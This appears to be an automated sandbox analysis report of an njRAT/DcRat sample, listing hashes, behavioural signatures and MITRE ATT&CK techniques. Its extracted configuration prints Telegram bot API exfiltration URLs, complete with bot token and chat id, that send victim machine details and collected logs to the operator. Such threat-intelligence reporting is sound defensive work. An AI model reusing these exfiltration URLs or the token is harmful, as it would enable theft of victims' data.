General
-
Target
Njrat.exe
-
Size
3.1MB
-
Sample
240704-khqmcaseqr
-
MD5
7bbb27a3b9ace5f7d403ba8d6ef58d28
-
SHA1
5effbe830a93770824ee60f65eac790dda1ee807
-
SHA256
d9dc76fcec48e47d8a10afa9ee40af17b856bff408bbc3eb36f5d362364a8d4c
-
SHA512
32774b5efc9a4c771ed74cb59d6e4221d4cfb92e05d18cf9d3ad53b957005cce84892ef9e563d2c4c932127dac595394e23d8bc3e2a6ab3a654acef5e24e0327
-
SSDEEP
49152:VbA3GVZoGDweuD4gWA7evLcjM3wwwZHFXIJ5nDWhVGUwwB3SNZts8zOqhsg:VbZDweuD4rcH9Vl65Dac7ssNj
Behavioral task
behavioral1
Sample
Njrat.exe
Resource
win7-20240221-en
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7254629454:AAGjOAEp2s0ZiG-YjCrzgjlow6_jHxosWUM/sendPhoto?chat_id=https://t.me/Eblan30000000_bot&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20d0ad2af92a8573eedb79c12f71dbdb0a04a63544%0A%E2%80%A2%20Comment%3A%20njRAT%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20TMUACBLB%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CAdobe%5CAcrobat%20Reader%20DC%5CReader%5CUIThemes%5CbackgroundTaskHost.ex
https://api.telegram.org/bot7254629454:AAGjOAEp2s0ZiG-YjCrzgjlow6_jHxosWUM/sendDocument?chat_id=https://t.me/Eblan30000000_bot&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20d0ad2af92a8573eedb79c12f71dbdb0a04a63544%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.750307
Targets
-
-
Target
Njrat.exe
-
Size
3.1MB
-
MD5
7bbb27a3b9ace5f7d403ba8d6ef58d28
-
SHA1
5effbe830a93770824ee60f65eac790dda1ee807
-
SHA256
d9dc76fcec48e47d8a10afa9ee40af17b856bff408bbc3eb36f5d362364a8d4c
-
SHA512
32774b5efc9a4c771ed74cb59d6e4221d4cfb92e05d18cf9d3ad53b957005cce84892ef9e563d2c4c932127dac595394e23d8bc3e2a6ab3a654acef5e24e0327
-
SSDEEP
49152:VbA3GVZoGDweuD4gWA7evLcjM3wwwZHFXIJ5nDWhVGUwwB3SNZts8zOqhsg:VbZDweuD4rcH9Vl65Dac7ssNj
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Command and Scripting Interpreter: PowerShell
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Loads dropped DLL
-
Accesses cryptocurrency files/wallets, possible credential harvesting
-
Checks installed software on the system
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Scheduled Task
1